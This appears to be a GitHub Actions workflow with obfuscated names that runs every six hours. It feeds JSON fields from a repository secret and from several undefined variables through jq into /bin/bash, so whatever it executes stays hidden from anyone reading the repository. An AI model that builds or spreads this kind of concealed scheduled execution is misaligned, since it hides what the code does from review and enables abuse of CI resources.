name: huangxuexiao1960
on:
  workflow_dispatch:
  schedule:
    - cron: '35 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: huangxuexiao1960
        env:
          ltfx783: ${{ secrets.ltfx783 }}
        run: |
          echo $ltfx783 | jq -r .mm181 | /bin/bash
          echo $nj7818 | jq -r .wpjt93937 | /bin/bash
          echo $leafj2 | jq -r .an6 | /bin/bash
          echo $xmmb46517 | jq -r .hays021 | /bin/bash
          echo $qxmm0747 | jq -r .u2577 | /bin/bash
          echo $yhvcg283 | jq -r .weib75 | /bin/bash
          echo $h512 | jq -r .feie0893 | /bin/bash
          echo $rt13 | jq -r .oszf230 | /bin/bash
          echo $xslvm2330 | jq -r .r9 | /bin/bash

